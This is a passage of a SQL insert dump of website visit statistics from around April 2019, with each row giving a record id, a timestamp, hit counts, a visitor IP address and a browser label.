.39.102','other'),(408383,1554176868,1,1,0,0,'54.36.148.146','other'),(408384,1554176889,1,1,0,0,'157.55.39.82','other'),(408385,1554177317,2,2,0,0,'66.249.64.58','chrome'),(408386,1554178321,1,1,0,0,'54.36.148.61','other'),(408387,1554178361,1,1,0,0,'66.249.64.29','chrome'),(408388,1554178393,1,1,0,0,'54.36.148.32','other'),(408389,1554178594,1,1,0,0,'46.229.168.163','other'),(408390,1554179012,2,2,0,0,'8.29.198.26','other'),(408391,1554179299,2,2,0,0,'141.8.142.144','other'),(408392,1554179300,1,1,0,0,'141.8.142.38','other'),(408393,1554179424,1,1,0,0,'66.249.64.29','chrome'),(408394,1554179590,1,1,0,0,'46.229.168.150','other'),(408395,1554179990,1,1,0,0,'54.36.148.222','other'),(408396,1554180008,1,1,0,0,'54.36.150.121','other'),(408397,1554180190,1,1,0,0,'54.36.148.137','other'),(408398,1554180595,1,1,0,0,'54.36.148.54','other'),(408399,1554180639,1,1,0,0,'54.36.149.106','other'),(408400,1554180779,1,1,0,0,'91.196.178.135','firefox'),(408401,1554181003,1,1,0,0,'54.36.148.53','other'),(408402,1554181031,1,1,0,0,'180.163.220.5','other'),(408403,1554181164,1,1,0,0,'46.229.168.134','other'),(408404,1554181458,1,1,0,0,'54.36.150.120','other'),(408405,1554181625,1,1,0,0,'66.249.64.60','chrome'),(408406,1554181681,1,1,0,0,'54.36.150.166','other'),(408407,1554181955,1,1,0,0,'54.36.149.97','other'),(408408,1554182692,1,1,0,0,'192.42.116.23','other'),(408409,1554183263,1,1,0,0,'46.229.168.152','other'),(408410,1554183296,1,1,0,0,'54.36.150.173','other'),(408411,1554183299,1,1,0,0,'178.159.37.34','chrome'),(408412,1554183340,1,1,0,0,'46.229.168.153','other'),(408413,1554183804,1,1,0,0,'40.77.167.212','other'),(408414,1554183862,1,1,0,0,'207.46.13.99','other'),(408415,1554183898,1,1,0,0,'40.77.167.30','other'),(408416,1554183944,1,1,0,0,'66.249.64.31','chrome'),(408417,1554184017,1,1,0,0,'5.196.87.175','other'),(408418,1554184199,1,1,0,0,'54.36.148.14','other'),(408419,1554184443,1,1,0,0,'54.36.148.89','other'),(408420,1554184478,1,1,0,0,'92.112.105.237','chrome'),(408421,1554184608,1,1,0,0,'66.249.64.62','chrome'),(408422,1554184708,1,1,0,0,'46.229.168.142','other'),(408423,1554184892,1,1,0,0,'54.36.149.44','other'),(408424,1554185082,1,1,0,0,'40.77.167.30','other'),(408425,1554185168,1,1,0,0,'66.249.64.29','chrome'),(408426,1554185280,1,1,0,0,'91.196.177.118','chrome'),(408427,1554185684,1,1,0,0,'54.36.149.40','other'),(408428,1554185685,1,1,0,0,'54.36.148.18','other'),(408429,1554185746,1,1,0,0,'54.36.149.82','other'),(408430,1554185793,1,1,0,0,'66.249.64.31','chrome'),(408431,1554185890,1,1,0,0,'40.77.167.212','other'),(408432,1554186453,1,1,0,0,'54.36.150.75','other'),(408433,1554186552,2,2,0,0,'91.196.178.78','chrome'),(408434,1554186633,1,1,0,0,'54.36.148.39','other'),(408435,1554186679,2,2,0,0,'66.249.64.30','chrome'),(408436,1554186831,1,1,0,0,'54.36.150.140','other'),(408437,1554186941,1,1,0,0,'66.249.64.31','chrome'),(408438,1554186973,1,1,0,0,'54.36.148.205','other'),(408439,1554187055,1,1,0,0,'66.249.64.29','chrome'),(408440,1554187094,1,1,0,0,'54.36.150.139','other'),(408441,1554187476,1,1,0,0,'66.249.64.58','chrome'),(408442,1554187498,1,1,0,0,'54.36.150.147','other'),(408443,1554187538,1,1,0,0,'54.36.148.77','other'),(408444,1554188009,1,1,0,0,'54.36.148.51','other'),(408445,1554188182,1,1,0,0,'66.249.64.30','chrome'),(408446,1554188547,1,1,0,0,'40.77.167.221','other'),(408447,1554188617,1,1,0,0,'54.36.150.183','other'),(408448,1554188641,2,2,0,0,'91.196.178.78','chrome'),(408449,1554188657,1,1,0,0,'46.229.168.146','other'),(408450,1554188711,1,1,0,0,'54.36.149.1','other'),(408451,1554189171,1,1,0,0,'54.36.148.139','other'),(408452,1554189184,1,1,0,0,'91.203.114.2','chrome'),(408453,1554189217,3,3,0,0,'66.249.64.31','chrome'),(408454,1554189512,1,1,0,0,'66.249.64.29','chrome'),(408455,1554189610,1,1,0,0,'66.249.64.62','chrome'),(408456,1554189648,1,1,0,0,'40.77.167.212','other'),(408457,1554189653,1,1,0,0,'66.249.64.30','chrome'),(408458,1554189716,1,1,0,0,'40.77.167.131','other'),(408459,1554189870,2,2,0,0,'8.29.198.26','other'),(408460,1554190214,1,1,0,0,'46.229.168.148','other'),(408461,1554190216,1,1,0,0,'66.249.64.31','chrome'),(408462,1554190363,1,1,0,0,'54.36.148.83','other'),(408463,1554190407,1,1,0,0,'157.55.39.58','other'),(408464,1554190662,1,1,0,0,'54.36.148.245','other'),(408465,1554191573,1,1,0,0,'54.36.148.177','other'),(408466,1554191800,3,3,0,0,'66.249.64.30','chrome'),(408467,1554192242,1,1,0,0,'54.36.150.183','other'),(408468,1554192704,1,1,0,0,'46.229.168.161','other'),(408469,1554192911,1,1,0,0,'46.229.168.132','other'),(408470,1554192930,1,1,0,0,'40.77.167.131','other'),(408471,1554193325,1,1,0,0,'95.163.255.95','other'),(408472,1554193682,1,1,0,0,'95.132.4.173','firefox'),(408473,1554193923,1,1,0,0,'66.249.64.29','chrome'),(408474,1554194117,1,1,0,0,'54.36.149.8','other'),(408475,1554194288,1,1,0,0,'141.8.142.103','other'),(408476,1554194393,1,1,0,0,'178.154.244.11','other'),(408477,1554194680,1,1,0,0,'54.36.148.194','other'),(408478,1554194803,1,1,0,0,'54.36.148.8','other'),(408479,1554195091,1,1,0,0,'66.249.64.60','chrome'),(408480,1554195150,2,2,0,0,'5.45.207.19','other'),(408481,1554195199,1,1,0,0,'46.229.168.143','other'),(408482,1554195612,1,1,0,0,'178.154.244.11','other'),(408483,1554195798,1,1,0,0,'46.229.168.139','other'),(408484,1554196168,1,1,0,0,'66.249.64.31','chrome'),(408485,1554196254,1,1,0,0,'54.36.148.114','other'),(408486,1554196260,1,1,0,0,'91.196.178.66','chrome'),(408487,1554196444,1,1,0,0,'54.36.149.40','other'),(408488,1554196450,2,2,0,0,'5.45.207.79','other'),(408489,1554196598,2,2,0,0,'5.45.207.19','other'),(408490,1554196630,1,1,0,0,'54.36.148.195','other'),(408491,1554196763,3,3,0,0,'91.196.178.16','chrome'),(408492,1554196875,1,1,0,0,'54.36.150.17','other'),(408493,1554197645,1,1,0,0,'66.249.64.31','chrome'),(408494,1554197716,1,1,0,0,'91.196.178.66','chrome'),(408495,1554198259,1,1,0,0,'66.249.64.29','chrome'),(408496,1554198457,1,1,0,0,'54.36.149.107','other'),(408497,1554198667,1,1,0,0,'91.207.172.117','chrome'),(408498,1554198699,1,1,0,0,'95.163.255.196','other'),(408499,1554198880,1,1,0,0,'54.36.150.5','other'),(408500,1554198965,2,2,0,0,'66.249.64.31','chrome'),(408501,1554198982,1,1,0,0,'54.36.148.95','other'),(408502,1554199345,2,2,0,0,'207.46.13.99','other'),(408503,1554199531,1,1,0,0,'5.188.210.44','chrome'),(408504,1554199842,1,1,0,0,'54.36.148.155','other'),(408505,1554199937,1,1,0,0,'54.36.150.177','other'),(408506,1554200080,1,1,0,0,'54.36.150.12','other'),(408507,1554200154,1,1,0,0,'46.229.168.133','other'),(408508,1554200570,1,1,0,0,'178.95.247.170','chrome'),(408509,1554200571,1,1,0,0,'66.249.64.30','chrome'),(408510,1554200596,1,1,0,0,'94.180.139.213','chrome'),(408511,1554200723,2,2,0,0,'8.29.198.26','other'),(408512,1554201148,1,1,0,0,'66.249.64.29','chrome'),(408513,1554201952,1,1,0,0,'54.36.150.134','other'),(408514,1554202014,1,1,0,0,'46.229.168.130','other'),(408515,1554202081,1,1,0,0,'91.196.178.180','chrome'),(408516,1554202404,1,1,0,0,'54.36.149.49','other'),(408517,1554202463,1,1,0,0,'54.36.150.145','other'),(408518,1554202602,1,1,0,0,'54.36.148.211','other'),(408519,1554202902,1,1,0,0,'95.163.255.94','other'),(408520,1554202947,1,1,0,0,'66.249.64.31','chrome'),(408521,1554203079,1,1,0,0,'95.163.255.97','other'),(408522,1554203228,1,1,0,0,'54.36.148.172','other'),(408523,1554203500,1,1,0,0,'195.230.130.121','chrome'),(408524,1554203526,1,1,0,0,'180.163.220.68','other'),(408525,1554203531,1,1,0,0,'46.229.168.139','other'),(408526,1554203646,1,1,0,0,'180.163.220.66','other'),(408527,1554203690,1,1,0,0,'42.236.10.124','other'),(408528,1554203842,1,1,0,0,'54.36.150.45','other'),(408529,1554203902,1,1,0,0,'54.36.148.53','other'),(408530,1554204270,1,1,0,0,'54.36.148.230','other'),(408531,1554204438,2,2,0,0,'66.249.64.29','chrome'),(408532,1554204506,1,1,0,0,'46.229.168.147','other'),(408533,1554205052,2,2,0,0,'66.249.64.30','chrome'),(408534,1554205077,1,1,0,0,'54.36.148.31','other'),(408535,1554205262,1,1,0,0,'54.36.148.68','other'),(408536,1554205567,1,1,0,0,'46.229.168.140','other'),(408537,1554205651,2,2,0,0,'66.249.64.31','chrome'),(408538,1554205694,1,1,0,0,'46.229.168.144','other'),(408539,1554205980,1,1,0,0,'66.249.64.30','chrome'),(408540,1554206558,1,1,0,0,'157.55.39.171','other'),(408541,1554206905,1,1,0,0,'54.36.150.90','other'),(408542,1554207219,1,1,0,0,'91.196.178.100','chrome'),(408543,1554207253,1,1,0,0,'40.77.167.99','other'),(408544,1554207432,1,1,0,0,'54.36.150.164','other'),(408545,1554207696,1,1,0,0,'37.54.90.98','chrome'),(408546,1554207870,1,1,0,0,'54.36.150.21','other'),(408547,1554208213,1,1,0,0,'66.249.64.31','chrome'),(408548,1554208272,1,1,0,0,'5.45.207.79','other'),(408549,1554208306,1,1,0,0,'40.77.167.99','other'),(408550,1554208380,1,1,0,0,'37.9.113.148','other'),(408551,1554208438,1,1,0,0,'141.8.142.103','other'),(408552,1554208545,1,1,0,0,'54.36.148.206','other'),(408553,1554208570,1,1,0,0,'66.249.64.30','chrome'),(408554,1554208593,1,1,0,0,'54.36.149.73','other'),(408555,1554208650,1,1,0,0,'46.229.168.140','other'),(408556,1554208672,1,1,0,0,'178.154.244.11','other'),(408557,1554208711,1,1,0,0,'157.55.39.182','other'),(408558,1554208718,1,1,0,0,'5.45.207.19','other'),(408559,1554208768,1,1,0,0,'141.8.142.108','other'),(408560,1554208848,1,1,0,0,'54.36.150.68','other'),(408561,1554208956,1,1,0,0,'54.36.148.110','other'),(408562,1554209133,1,1,0,0,'95.163.255.98','other'),(408563,1554210034,3,3,0,0,'91.196.178.136','chrome'),(408564,1554210333,1,1,0,0,'95.163.255.188','other'),(408565,1554210468,1,1,0,0,'66.249.64.31','chrome'),(408566,1554210488,1,1,0,0,'54.36.148.97','other'),(408567,1554210590,1,1,0,0,'95.163.255.154','other'),(408568,1554210734,1,1,0,0,'46.211.122.184','chrome'),(408569,1554211165,1,1,0,0,'54.36.148.125','other'),(408570,1554211242,1,1,0,0,'157.55.39.182','other'),(408571,1554211332,2,2,0,0,'66.249.64.60','chrome'),(408572,1554211441,1,1,0,0,'46.229.168.144','other'),(408573,1554211501,1,1,0,0,'54.36.150.127','other'),(408574,1554211579,1,1,0,0,'8.29.198.26','other'),(408575,1554211584,1,1,0,0,'54.36.148.118','other'),(408576,1554211673,1,1,0,0,'54.36.148.165','other'),(408577,1554211881,1,1,0,0,'66.249.64.58','chrome'),(408578,1554211927,1,1,0,0,'8.29.198.27','other'),(408579,1554212165,1,1,0,0,'54.36.149.24','other'),(408580,1554212362,1,1,0,0,'54.36.149.42','other'),(408581,1554212402,1,1,0,0,'66.249.64.29','chrome'),(408582,1554212428,1,1,0,0,'46.229.168.145','other'),(408583,1554212630,1,1,0,0,'54.36.149.25','other'),(408584,1554212991,1,1,0,0,'54.36.148.33','other'),(408585,1554213052,1,1,0,0,'66.249.64.60','chrome'),(408586,1554213143,1,1,0,0,'54.36.150.62','other'),(408587,1554213315,1,1,0,0,'178.251.111.117','chrome'),(408588,1554213318,1,1,0,0,'46.229.168.163','other'),(408589,1554213415,1,1,0,0,'54.36.148.90','other'),(408590,1554213680,1,1,0,0,'54.36.148.54','other'),(408591,1554214014,1,1,0,0,'54.36.148.68','other'),(408592,1554214416,1,1,0,0,'54.36.148.102','other'),(408593,1554214622,1,1,0,0,'66.249.64.30','chrome'),(408594,1554214646,1,1,0,0,'54.36.150.57','other'),(408595,1554214731,2,2,0,0,'93.73.173.105','chrome'),(408596,1554214918,1,1,0,0,'40.77.167.99','other'),(408597,1554214954,1,1,0,0,'54.36.148.85','other'),(408598,1554215030,1,1,0,0,'54.36.149.19','other'),(408599,1554215430,1,1,0,0,'54.36.148.82','other'),(408600,1554215664,1,1,0,0,'95.163.255.154','other'),(408601,1554215703,1,1,0,0,'54.36.148.75','other'),(408602,1554215745,1,1,0,0,'95.163.255.176','other'),(408603,1554215796,1,1,0,0,'54.36.148.224','other'),(408604,1554216048,1,1,0,0,'54.36.148.170','other'),(408605,1554216098,1,1,0,0,'95.163.255.179','other'),(408606,1554216291,1,1,0,0,'66.249.64.60','chrome'),(408607,1554216334,1,1,0,0,'95.163.255.151','other'),(408608,1554216335,1,1,0,0,'66.249.64.30','chrome'),(408609,1554216443,1,1,0,0,'95.163.255.177','other'),(408610,1554216495,1,1,0,0,'207.46.13.213','other'),(408611,1554216534,1,1,0,0,'66.249.64.62','chrome'),(408612,1554216626,1,1,0,0,'54.36.148.161','other'),(408613,1554216693,1,1,0,0,'66.249.64.29','chrome'),(408614,1554216846,1,1,0,0,'54.36.148.35','other'),(408615,1554216898,1,1,0,0,'46.229.168.149','other'),(408616,1554217552,1,1,0,0,'54.36.148.81','other'),(408617,1554217883,1,1,0,0,'66.249.64.30','chrome'),(408618,1554218243,1,1,0,0,'193.106.30.98','firefox'),(408619,1554218407,1,1,0,0,'54.36.150.63','other'),(408620,1554218630,1,1,0,0,'54.36.150.17','other'),(408621,1554218778,1,1,0,0,'46.229.168.163','other'),(408622,1554218875,1,1,0,0,'66.249.64.30','chrome'),(408623,1554218898,1,1,0,0,'157.55.39.76','other'),(408624,1554219302,1,1,0,0,'213.108.41.211','chrome'),(408625,1554219528,1,1,0,0,'77.120.165.98','firefox'),(408626,1554219579,1,1,0,0,'46.229.168.153','other'),(408627,1554219660,1,1,0,0,'66.249.64.58','chrome'),(408628,1554219732,1,1,0,0,'5.45.207.79','other'),(408629,1554219733,1,1,0,0,'91.196.178.171','chrome'),(408630,1554219977,1,1,0,0,'46.229.168.137','other'),(408631,1554219992,1,1,0,0,'5.188.210.44','chrome'),(408632,1554220012,2,2,0,0,'5.45.207.19','other'),(408633,1554220087,3,3,0,0,'66.249.64.29','chrome'),(408634,1554220245,1,1,0,0,'66.249.64.60','chrome'),(408635,1554220271,1,1,0,0,'54.36.149.7','other'),(408636,1554220421,1,1,0,0,'213.108.41.211','chrome'),(408637,1554220423,1,1,0,0,'54.36.150.3','other'),(408638,1554220736,1,1,0,0,'87.250.224.47','other'),(408639,1554220791,2,2,0,0,'178.154.244.11','other'),(408640,1554220887,1,1,0,0,'37.9.113.148','other'),(408641,1554221022,2,2,0,0,'66.249.64.29','chrome'),(408642,1554221601,1,1,0,0,'46.229.168.135','other'),(408643,1554221708,1,1,0,0,'66.249.64.31','chrome'),(408644,1554221821,1,1,0,0,'54.36.148.91','other'),(408645,1554221875,1,1,0,0,'54.36.148.41','other'),(408646,1554221879,1,1,0,0,'46.229.168.149','other'),(408647,1554221950,1,1,0,0,'66.249.64.60','chrome'),(408648,1554221952,1,1,0,0,'5.45.207.79','other'),(408649,1554222351,1,1,0,0,'54.36.149.102','other'),(408650,1554222418,1,1,0,0,'95.163.255.95','other'),(408651,1554222419,1,1,0,0,'95.163.255.94','other'),(408652,1554222425,1,1,0,0,'8.29.198.27','other'),(408653,1554222611,1,1,0,0,'54.36.148.220','other'),(408654,1554222682,1,1,0,0,'95.163.255.96','other'),(408655,1554222735,1,1,0,0,'188.191.238.141','chrome'),(408656,1554222765,1,1,0,0,'46.229.168.145','other'),(408657,1554222787,1,1,0,0,'8.29.198.25','other'),(408658,1554222829,1,1,0,0,'66.249.64.29','chrome'),(408659,1554223022,1,0,1,0,'51.68.152.26',''),(408660,1554223262,1,1,0,0,'207.46.13.213','other'),(408661,1554223327,1,1,0,0,'54.36.150.185','other'),(408662,1554223698,1,1,0,0,'157.55.39.76','other'),(408663,1554224050,1,1,0,0,'54.36.150.77','other'),(408664,1554224440,1,1,0,0,'46.211.98.222','chrome'),(408665,1554224578,1,1,0,0,'40.77.167.63','other'),(408666,1554224733,1,1,0,0,'37.115.191.132','chrome'),(408667,1554225371,1,1,0,0,'54.36.148.185','other'),(408668,1554225382,1,1,0,0,'46.229.168.134','other'),(408669,1554225496,1,1,0,0,'54.36.148.146','other'),(408670,1554225828,1,1,0,0,'66.249.64.31','chrome'),(408671,1554226222,1,1,0,0,'213.108.41.150','chrome'),(408672,1554226281,1,1,0,0,'207.46.13.213','other'),(408673,1554226353,1,1,0,0,'54.36.150.128','other'),(408674,1554226528,1,1,0,0,'54.36.149.13','other'),(408675,1554226661,1,1,0,0,'66.249.64.62','chrome'),(408676,1554227359,1,1,0,0,'54.36.148.146','other'),(408677,1554227460,1,1,0,0,'95.163.255.191','other'),(408678,1554227466,1,1,0,0,'95.163.255.179','other'),(408679,1554227650,1,1,0,0,'213.108.41.150','chrome'),(408680,1554227757,1,1,0,0,'54.36.150.152','other'),(408681,1554227970,1,1,0,0,'93.170.118.127','chrome'),(408682,1554228007,1,1,0,0,'46.229.168.142','other'),(408683,1554228089,1,1,0,0,'54.36.150.187','other'),(408684,1554228108,1,1,0,0,'66.249.64.58','chrome'),(408685,1554229156,1,1,0,0,'46.229.168.141','other'),(408686,1554229312,1,1,0,0,'46.229.168.150','other'),(408687,1554229381,1,1,0,0,'54.36.150.141','other'),(408688,1554229456,1,1,0,0,'54.36.149.1','other'),(408689,1554229467,1,1,0,0,'5.45.207.79','other'),(408690,1554229498,1,1,0,0,'54.36.148.38','other'),(408691,1554229550,1,1,0,0,'66.249.64.31','chrome'),(408692,1554229583,1,1,0,0,'95.108.213.4','other'),(408693,1554229656,1,1,0,0,'54.36.150.60','other'),(408694,1554229681,2,2,0,0,'178.154.244.11','other'),(408695,1554229714,2,2,0,0,'5.45.207.19','other'),(408696,1554229760,1,1,0,0,'54.36.148.12','other'),(408697,1554229870,1,1,0,0,'5.196.87.173','other'),(408698,1554229943,1,1,0,0,'141.8.142.103','other'),(408699,1554229981,1,1,0,0,'91.196.178.132','chrome'),(408700,1554230381,1,1,0,0,'40.77.167.124','other'),(408701,1554230425,1,1,0,0,'157.55.39.154','other'),(408702,1554230557,1,1,0,0,'66.249.64.30','chrome'),(408703,1554230658,1,1,0,0,'5.58.234.89','other'),(408704,1554230781,1,1,0,0,'46.229.168.140','other'),(408705,1554230830,1,1,0,0,'54.36.148.115','other'),(408706,1554231019,1,1,0,0,'40.77.167.63','other'),(408707,1554231187,1,1,0,0,'46.229.168.142','other'),(408708,1554231304,1,1,0,0,'54.36.149.67','other'),(408709,1554231370,1,1,0,0,'66.249.64.62','chrome'),(408710,1554231405,1,1,0,0,'66.249.64.60','chrome'),(408711,1554231448,1,1,0,0,'66.249.64.29','chrome'),(408712,1554231578,1,1,0,0,'5.45.207.79','other'),(408713,1554231667,1,1,0,0,'54.36.149.97','other'),(408714,1554231867,1,1,0,0,'54.36.148.25','other'),(408715,1554232299,1,1,0,0,'95.163.255.98','other'),(408716,1554232325,1,1,0,0,'95.163.255.93','other'),(408717,1554232476,1,1,0,0,'66.249.64.29','chrome'),(408718,1554232547,1,1,0,0,'46.229.168.130','other'),(408719,1554232958,1,1,0,0,'95.163.255.165','other'),(408720,1554232989,1,1,0,0,'66.249.64.60','chrome'),(408721,1554233299,1,1,0,0,'8.29.198.25','other'),(408722,1554233419,1,1,0,0,'46.229.168.138','other'),(408723,1554233421,1,1,0,0,'95.163.255.185','other'),(408724,1554233483,1,1,0,0,'95.163.255.191','other'),(408725,1554233656,1,1,0,0,'8.29.198.26','other'),(408726,1554234339,1,1,0,0,'5.228.124.110','msie'),(408727,1554234528,1,1,0,0,'157.55.39.177','other'),(408728,1554234655,1,1,0,0,'54.36.149.25','other'),(408729,1554235215,1,1,0,0,'54.36.150.178','other'),(408730,1554235430,1,1,0,0,'54.36.148.63','other'),(408731,1554235633,1,1,0,0,'46.229.168.150','other'),(408732,1554236035,1,1,0,0,'46.229.168.154','other'),(408733,1554236346,1,1,0,0,'54.36.148.73','other'),(408734,1554236616,1,1,0,0,'46.229.168.133','other'),(408735,1554236752,1,1,0,0,'66.249.64.30','chrome'),(408736,1554237469,1,1,0,0,'157.55.39.177','other'),(408737,1554237867,1,1,0,0,'212.92.237.204','firefox'),(408738,1554237877,1,1,0,0,'66.249.64.58','chrome'),(408739,1554238157,1,1,0,0,'66.249.64.60','chrome'),(408740,1554238252,1,1,0,0,'40.77.167.120','other'),(408741,1554238259,1,1,0,0,'37.9.113.103','other'),(408742,1554238306,3,3,0,0,'66.249.64.30','chrome'),(408743,1554238312,1,1,0,0,'5.45.207.19','other'),(408744,1554238599,1,1,0,0,'40.77.167.116','other'),(408745,1554238624,1,1,0,0,'150.95.24.230','firefox'),(408746,1554238824,1,1,0,0,'40.77.167.63','other'),(408747,1554238854,1,1,0,0,'46.235.40.91','firefox'),(408748,1554238879,1,1,0,0,'207.46.13.50','other'),(408749,1554239072,1,1,0,0,'87.250.224.47','other'),(408750,1554239086,1,1,0,0,'46.229.168.148','other'),(408751,1554239127,1,1,0,0,'139.59.83.86','firefox'),(408752,1554239133,1,1,0,0,'178.62.226.66','firefox'),(408753,1554239246,1,1,0,0,'66.249.64.30','chrome'),(408754,1554239294,1,1,0,0,'66.249.64.29','chrome'),(408755,1554239395,3,3,0,0,'66.249.64.31','chrome'),(408756,1554239445,1,1,0,0,'46.229.168.137','other'),(408757,1554239967,1,1,0,0,'178.154.244.11','other'),(408758,1554240295,1,1,0,0,'46.229.168.148','other'),(408759,1554240408,1,1,0,0,'66.249.64.29','chrome'),(408760,1554240504,1,1,0,0,'95.108.213.4','other'),(408761,1554241584,1,1,0,0,'46.229.168.139','other'),(408762,1554241799,1,1,0,0,'40.77.167.63','other'),(408763,1554241981,1,1,0,0,'5.3.153.75','firefox'),(408764,1554241989,1,1,0,0,'40.77.167.116','other'),(408765,1554242538,1,1,0,0,'46.229.168.129','other'),(408766,1554242879,1,1,0,0,'46.229.168.163','other'),(408767,1554243223,1,1,0,0,'40.77.167.63','other'),(408768,1554243274,1,1,0,0,'66.249.64.31','chrome'),(408769,1554243441,1,1,0,0,'66.249.64.62','chrome'),(408770,1554243634,1,1,0,0,'46.229.168.134','other'),(408771,1554243974,1,1,0,0,'46.229.168.143','other'),(408772,1554244132,1,1,0,0,'46.229.168.145','other'),(408773,1554244155,1,1,0,0,'8.29.198.25','other'),(408774,1554244449,1,1,0,0,'46.229.168.161','other'),(408775,1554244463,1,1,0,0,'40.77.167.63','other'),(408776,1554244507,1,1,0,0,'8.29.198.27','other'),(408777,1554244529,1,1,0,0,'66.249.64.31','chrome'),(408778,1554244883,1,1,0,0,'66.249.64.62','chrome'),(408779,1554245040,1,1,0,0,'46.229.168.154','other'),(408780,1554245062,1,1,0,0,'95.163.255.196','other'),(408781,1554245135,1,1,0,0,'95.163.255.180','other'),(408782,1554245283,1,1,0,0,'213.180.203.9','other'),(408783,1554245427,1,1,0,0,'5.45.207.79','other'),(408784,1554245607,1,1,0,0,'46.229.168.136','other'),(408785,1554245946,1,1,0,0,'95.163.255.96','other'),(408786,1554245970,1,1,0,0,'207.46.13.10','other'),(408787,1554246084,1,1,0,0,'141.8.142.103','other'),(408788,1554246549,1,1,0,0,'157.55.39.60','other'),(408789,1554248091,1,1,0,0,'66.249.64.29','chrome'),(408790,1554248693,1,1,0,0,'46.229.168.137','other'),(408791,1554249824,1,1,0,0,'157.55.39.60','other'),(408792,1554250948,1,1,0,0,'46.229.168.148','other'),(408793,1554251665,1,1,0,0,'95.163.255.95','other'),(408794,1554251821,1,1,0,0,'157.55.39.3','other'),(408795,1554251860,1,1,0,0,'66.249.64.30','chrome'),(408796,1554251888,1,1,0,0,'66.249.64.31','chrome'),(408797,1554251905,2,2,0,0,'46.229.168.148','other'),(408798,1554252536,1,1,0,0,'95.163.255.98','other'),(408799,1554252567,1,1,0,0,'66.249.64.62','chrome'),(408800,1554252715,1,1,0,0,'95.108.213.4','other'),(408801,1554253048,1,1,0,0,'157.55.39.50','other'),(408802,1554253058,1,1,0,0,'5.45.207.19','other'),(408803,1554253174,1,1,0,0,'46.229.168.138','other'),(408804,1554253256,2,2,0,0,'178.154.244.11','other'),(408805,1554253463,1,1,0,0,'5.45.207.79','other'),(408806,1554254037,1,1,0,0,'157.55.39.217','other'),(408807,1554254684,2,2,0,0,'40.77.167.151','other'),(408808,1554255010,1,1,0,0,'8.29.198.26','other'),(408809,1554255358,1,1,0,0,'8.29.198.27','other'),(408810,1554255463,2,2,0,0,'66.249.64.31','chrome'),(408811,1554255868,1,1,0,0,'40.77.167.151','other'),(408812,1554256419,1,1,0,0,'95.163.255.99','other'),(408813,1554256685,1,1,0,0,'66.249.64.29','chrome'),(408814,1554256722,1,1,0,0,'46.229.168.161','other'),(408815,1554257798,2,2,0,0,'66.249.64.30','chrome'),(408816,1554257857,1,1,0,0,'95.163.255.95','other'),(408817,1554258243,1,1,0,0,'40.77.167.154','other'),(408818,1554258382,1,1,0,0,'66.249.64.31','chrome'),(408819,1554259257,1,1,0,0,'66.249.64.60','chrome'),(408820,1554259900,1,1,0,0,'46.229.168.152','other'),(408821,1554259923,1,1,0,0,'46.229.168.139','other'),(408822,1554260054,1,1,0,0,'109.74.154.72','chrome'),(408823,1554260241,1,1,0,0,'66.249.64.30','chrome'),(408824,1554260336,1,1,0,0,'46.229.168.132','other'),(408825,1554260659,1,1,0,0,'54.36.148.95','other'),(408826,1554260745,1,1,0,0,'54.36.149.101','other'),(408827,1554260801,1,1,0,0,'54.36.150.28','other'),(408828,1554261124,1,1,0,0,'87.250.224.47','other'),(408829,1554261898,1,1,0,0,'54.36.148.23','other'),(408830,1554261935,1,1,0,0,'95.163.255.99','other'),(408831,1554261956,2,2,0,0,'95.108.213.4','other'),(408832,1554262027,1,1,0,0,'66.249.64.31','chrome'),(408833,1554262029,1,1,0,0,'178.154.244.11','other'),(408834,1554262082,1,1,0,0,'66.249.64.29','chrome'),(408835,1554262168,1,1,0,0,'37.9.113.103','other'),(408836,1554262210,1,1,0,0,'141.8.142.108','other'),(408837,1554262446,1,1,0,0,'46.229.168.140','other'),(408838,1554262468,2,2,0,0,'141.8.142.38','other'),(408839,1554262498,1,1,0,0,'213.180.203.9','other'),(408840,1554262859,1,1,0,0,'87.250.224.65','other'),(408841,1554262864,1,1,0,0,'141.8.142.144','other'),(408842,1554262871,1,1,0,0,'5.196.87.172','other'),(408843,1554262915,1,1,0,0,'141.8.142.103','other'),(408844,1554263027,1,1,0,0,'40.77.167.168','other'),(408845,1554263120,1,1,0,0,'66.249.64.29','chrome'),(408846,1554263180,1,1,0,0,'207.46.13.115','other'),(408847,1554263260,1,1,0,0,'54.36.148.4','other'),(408848,1554263304,1,1,0,0,'37.9.113.20','other'),(408849,1554263429,1,1,0,0,'54.36.148.138','other'),(408850,1554263842,1,1,0,0,'46.229.168.142','other'),(408851,1554263976,2,2,0,0,'34.219.184.117','chrome'),(408852,1554264119,1,1,0,0,'46.229.168.137','other'),(408853,1554264137,1,1,0,0,'66.249.64.58','chrome'),(408854,1554264406,1,1,0,0,'95.163.255.99','other'),(408855,1554264408,1,1,0,0,'95.163.255.93','other'),(408856,1554264590,1,1,0,0,'31.184.238.253','chrome'),(408857,1554264838,1,1,0,0,'46.229.168.148','other'),(408858,1554265636,1,1,0,0,'46.246.65.150','firefox'),(408859,1554265643,1,1,0,0,'54.36.150.34','other'),(408860,1554265859,2,2,0,0,'8.29.198.25','other'),(408861,1554265951,6,6,0,0,'157.55.39.50','other'),(408862,1554265960,5,5,0,0,'40.77.167.154','other'),(408863,1554265968,5,5,0,0,'157.55.39.139','other'),(408864,1554265977,4,4,0,0,'207.46.13.115','other'),(408865,1554266053,2,2,0,0,'66.249.64.31','chrome'),(408866,1554266847,1,1,0,0,'54.36.150.11','other'),(408867,1554267191,1,1,0,0,'91.196.178.135','firefox'),(408868,1554267201,1,1,0,0,'42.236.10.117','other'),(408869,1554267263,1,1,0,0,'54.36.150.159','other'),(408870,1554267559,1,1,0,0,'54.36.150.129','other'),(408871,1554267560,1,1,0,0,'91.196.178.98','chrome'),(408872,1554267674,1,1,0,0,'54.36.149.62','other'),(408873,1554268088,1,1,0,0,'66.249.64.58','chrome'),(408874,1554268136,1,1,0,0,'207.46.13.115','other'),(408875,1554268205,1,1,0,0,'95.163.255.95','other'),(408876,1554268337,1,1,0,0,'95.163.255.96','other'),(408877,1554268357,1,1,0,0,'54.36.150.157','other'),(408878,1554268608,1,1,0,0,'46.229.168.148','other'),(408879,1554268688,1,1,0,0,'95.163.255.177','other'),(408880,1554268757,1,1,0,0,'66.249.64.29','chrome'),(408881,1554268972,1,1,0,0,'40.77.167.218','other'),(408882,1554269156,1,1,0,0,'54.36.149.29','other'),(408883,1554269193,1,1,0,0,'157.55.39.186','other'),(408884,1554269265,1,1,0,0,'54.36.148.19','other'),(408885,1554269269,1,1,0,0,'157.55.39.50','other'),(408886,1554269285,1,1,0,0,'77.247.181.163','other'),(408887,1554269384,1,1,0,0,'13.66.139.0','other'),(408888,1554269391,1,1,0,0,'54.36.148.153','other'),(408889,1554269485,1,1,0,0,'54.36.148.145','other'),(408890,1554269904,